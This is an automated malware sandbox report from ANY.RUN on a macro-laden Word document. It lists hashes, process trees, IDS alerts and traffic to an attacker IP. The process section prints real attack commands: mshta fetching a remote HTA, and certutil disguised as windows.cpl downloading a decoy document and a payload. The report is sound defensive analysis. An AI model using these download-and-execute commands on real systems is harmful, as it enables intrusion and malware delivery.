analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Mau cam ket danh cho Dang vien.doc

Full analysis: https://app.any.run/tasks/e42a8e1b-969f-4d94-8c6b-82ad90f57a72
Verdict: Malicious activity
Analysis date: April 23, 2019, 10:18:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 936, Author: Administrator, Template: Normal, Last Saved By: Windows , Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 16 10:47:00 2016, Last Saved Time/Date: Tue Apr 23 04:40:00 2019, Number of Pages: 1, Number of Words: 9, Number of Characters: 54, Security: 0
MD5:

509F196AF156F4BD6C9CED1D6FEE93A0

SHA1:

B40647990E32B0D0EAD4AAC8962E47D52DD91350

SHA256:

2D499916097358B0EB5817E29188C5D7721B1B5ADAB428BD7E09BB3D9D5FBFDF

SSDEEP:

768:kqmrNT1mkxbBtA7SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS6YqmL8+M0j85Q:krRZ7u6YVfMYGNvgAPoS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • windows.cpl (PID: 2500)
      • windows.cpl (PID: 2112)
      • windows.cpl (PID: 3796)
      • windows.cpl (PID: 184)
      • windows.cpl (PID: 948)
      • winwsh.exe (PID: 3624)
      • InstallUtil.exe (PID: 2428)
      • wtask.exe (PID: 1436)
      • InstallUtil.exe (PID: 2712)
      • wtask.exe (PID: 3332)
      • winwsh.exe (PID: 2376)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2696)
    • Loads the Task Scheduler COM API

      • wtask.exe (PID: 3332)
      • wtask.exe (PID: 1436)
    • Loads dropped or rewritten executable

      • InstallUtil.exe (PID: 2428)
      • InstallUtil.exe (PID: 2712)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3532)
      • mshta.exe (PID: 1524)
      • powershell.exe (PID: 3528)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1928)
      • cmd.exe (PID: 1860)
      • powershell.exe (PID: 3528)
      • cmd.exe (PID: 1888)
      • cmd.exe (PID: 2832)
    • Starts application with an unusual extension

      • cmd.exe (PID: 2616)
      • cmd.exe (PID: 2524)
      • cmd.exe (PID: 3136)
      • cmd.exe (PID: 2908)
      • cmd.exe (PID: 1476)
    • Starts Microsoft Office Application

      • cmd.exe (PID: 3696)
    • Creates files in the user directory

      • powershell.exe (PID: 3528)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 1524)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2180)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2180)
      • WINWORD.EXE (PID: 2552)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Administrator
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Windows ?û?
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2016:08:16 09:47:00
ModifyDate: 2019:04:23 03:40:00
Pages: 1
Words: 9
Characters: 54
Security: None
Category: -
PresentationTarget: -
Manager: -
Company: -
Bytes: -
Lines: 1
Paragraphs: 1
Slides: -
Notes: -
HiddenSlides: -
MMClips: -
CharCountWithSpaces: 62
AppVersion: 14
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
CodePage: Windows Simplified Chinese (PRC, Singapore)
KSOProductBuildVer: 2052-10.1.0.5864
CompObjUserTypeLen: 28
CompObjUserType: Microsoft Word 97-2003 ?ĵ?
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
75
Monitored processes
31
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start winword.exe no specs mshta.exe cmd.exe no specs cmd.exe no specs cmd.exe cmd.exe no specs windows.cpl cmd.exe no specs windows.cpl no specs cmd.exe no specs cmd.exe no specs windows.cpl winword.exe no specs cmd.exe no specs windows.cpl no specs cmd.exe no specs windows.cpl no specs cmd.exe no specs powershell.exe cmd.exe cmd.exe cmd.exe cmd.exe no specs wtask.exe no specs cmd.exe no specs wtask.exe no specs cmd.exe no specs winwsh.exe no specs installutil.exe winwsh.exe no specs installutil.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2180"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Mau cam ket danh cho Dang vien.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1524mshta.exe http://144.202.54.86:80/download/Mau2.htaC:\Windows\system32\mshta.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3332"C:\Windows\System32\cmd.exe" /c echo cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" >C:\Users\admin\AppData\Local\Temp\cp13.batC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3532"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\cp13.batC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1928cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" C:\Windows\system32\cmd.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2616"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Dang vien.docx" C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Dang vien.docx"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2500C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Dang vien.docx" C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Dang vien.docx"C:\Users\admin\AppData\Local\Temp\windows.cpl
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2524"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Dang vien.docx" deleteC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2112C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Dang vien.docx" deleteC:\Users\admin\AppData\Local\Temp\windows.cplcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3696"C:\Windows\System32\cmd.exe" /c start C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Dang vien.docx"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 855
Read events
2 386
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
11
Text files
8
Unknown types
3

Dropped files

PID
Process
Filename
Type
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2D95.tmp.cvr
MD5:
SHA256:
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF4093A39A9064FEBF.TMP
MD5:
SHA256:
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFBBC8B25535A3D666.TMP
MD5:
SHA256:
2552WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4582.tmp.cvr
MD5:
SHA256:
3528powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FJAMDLZ0QQAPVJJ7J7I4.temp
MD5:
SHA256:
2500windows.cplC:\Users\admin\AppData\Local\Temp\Mau cam ket danh cho Dang vien.docxdocument
MD5:9A47F5E6303E5913D1034A7B120B730E
SHA256:4CC1B6BB2E502240C12E164E9E14A633231538650573B99E008D31B74AAF7BE3
2180WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:E0A6D871DF9AF8A843020CC2FC70CA4E
SHA256:33FAFDD37700ECE853AC83901FBEAB68A9A8E725B6B27DF6C65EDBF64767BE47
2500windows.cplC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FD092B6DA7F80290D235097A348E1E53binary
MD5:09D51AAF783A2E6AC3292B39108727D9
SHA256:080F615CEB51C956E556082F847BC4AF74E9FFCAE91CCD4711BA353CE81EA854
3332cmd.exeC:\Users\admin\AppData\Local\Temp\cp13.battext
MD5:2683560E0982D02885911E061CD38801
SHA256:B687C38DB1917278186A1D38C2439AB2F04BEFC2570A3BE09E383A2FF15A7844
3528powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF114d04.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
13
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2500
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Dang%20vien.docx
US
document
22.1 Kb
suspicious
2500
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Dang%20vien.docx
US
document
22.1 Kb
suspicious
1524
mshta.exe
GET
144.202.54.86:80
http://144.202.54.86/download/Mau2.hta
US
suspicious
3796
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/0423.dat
US
text
66.8 Kb
suspicious
3796
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/0423.dat
US
text
66.8 Kb
suspicious
2428
InstallUtil.exe
GET
200
205.185.216.10:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
55.6 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2428
InstallUtil.exe
205.185.216.10:80
www.download.windowsupdate.com
Highwinds Network Group, Inc.
US
whitelisted
1524
mshta.exe
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
3796
windows.cpl
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
2500
windows.cpl
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
2428
InstallUtil.exe
144.202.54.86:443
Baltimore Technology Park, LLC
US
suspicious

DNS requests

Domain
IP
Reputation
www.download.windowsupdate.com
  • 205.185.216.10
  • 205.185.216.10
  • 205.185.216.10
  • 205.185.216.42
whitelisted

Threats

PID
Process
Class
Message
1524
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
1524
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
2500
windows.cpl
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3796
windows.cpl
Misc activity
ET INFO Certificate with Unknown Content M1
3796
windows.cpl
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3796
windows.cpl
Misc activity
ET INFO Certificate with Unknown Content M1
1524
mshta.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
1524
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] PowerShell Execution
2428
InstallUtil.exe
Generic Protocol Command Decode
SURICATA STREAM excessive retransmissions
2 ETPRO signatures available at the full report
No debug info